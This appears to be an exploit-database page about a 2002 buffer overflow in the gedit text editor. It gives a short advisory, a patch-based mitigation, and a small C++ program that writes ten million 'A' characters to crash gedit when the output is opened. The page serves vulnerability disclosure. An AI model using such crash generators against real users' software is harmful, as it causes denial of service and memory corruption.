header-logo
Suggest Exploit
vendor:
gedit
by:
MegaHz
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: gedit
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2002

gedit Buffer Overflow

A problem has been reported in the handling of certain file types by gEdit. Memory corruption may occur when handling files containing long strings. Because of this, it may be possible to cause memory corruption.

Mitigation:

Ensure that gEdit is updated to the latest version.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/9090/info

A problem has been reported in the handling of certain file types by gEdit. Memory corruption may occur when handling files containing long strings. Because of this, it may be possible to cause memory corruption. 

/*
        simple buffer overflow generator by MegaHz megahz@megahz.org
*/
#include <iostream>
using namespace std;

int main()
{
int i;
for (i=0;i<=9999999;i++)
        {
        cout << "A";
        }
        return 0;
}